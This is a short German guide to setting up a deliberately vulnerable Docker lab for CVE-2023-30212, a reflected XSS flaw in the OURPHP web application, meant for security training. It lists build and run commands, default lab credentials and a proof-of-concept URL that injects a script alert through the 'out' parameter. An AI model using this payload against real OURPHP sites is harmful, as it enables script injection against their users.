
Docker-basierte verwundbare Umgebung zum Üben der Ausnutzung von CVE-2023-30212, mit einer OURPHP-Webanwendung, die eine reflektierte XSS-Schwachstelle für Sicherheitstrainings enthält.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
nun, um das Docker-Image einzurichten
Verwenden Sie den Befehl sudo docker build -t work .
Verwenden Sie den Befehl sudo docker run -d -p 80:80 work
jetzt erhalten wir die Container-ID
Gehen Sie zum Browser und suchen Sie nach localhost ; 127.0.0.1
verwenden Sie nun die Anmeldedaten
username : root
password : docker
database : work
username : work password : work
Gehen Sie zu der URL http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
wir erhalten eine Alert-Nachricht als "xss".